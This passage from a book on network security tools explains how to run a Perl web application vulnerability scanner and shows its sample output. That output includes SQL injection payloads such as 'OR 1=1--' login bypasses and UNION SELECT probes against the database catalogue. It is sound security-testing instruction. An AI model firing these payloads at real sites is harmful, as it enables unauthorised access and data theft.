Using the Scanner

You use extendedScanner.pl in virtually the same way in which you use simpleScanner.pl. Like the previous scanner, extendedScanner.pl requires an input file generated using parseLog.pl, and it supports the same options. For reference, here is some sample output from the scanner:

** Extended Web Application Scanner ** ** Beginning Scan ** .......... ALERT: Directory Listing Detected: => GET /images/ .... ALERT: Database Error Message Detected: => POST /search.asp?cat=te'st&searchstring= .. ALERT: Possible SQL Injection Exploit: => POST /search.asp?cat=1'%20OR%201%3D1--&searchstring= ................. ALERT: Possible SQL Injection Exploit: => POST /search.asp?cat=1'%20UNION%20ALL%20SELECT%20CONVERT(INT,1),CONVERT(INT,1), CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT (VARCHAR,1)%20FROM%20MASTER..SYSDATABASES--&searchstring= ....... ALERT: 500 Error Code Detected: => GET /template.asp?content=te'st ........................ ALERT: Generic Error Message Detected: => POST /login.asp?txtUsername=te'st&txtPassword=password&action=login& session=1 .. ALERT: Possible SQL Injection Exploit: => POST /login.asp?txtUsername=1'%20OR%201%3D1--&txtPassword=password& action=login&session=1 .................................. ALERT: Possible SQL Injection Exploit: => POST /login.asp?txtUsername=1'%20UNION%20ALL%20SELECT%20CONVERT(INT,1), CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(INT,1),CONVERT(VARCHAR,1), CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(INT,1), ...

Get Network Security Tools now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.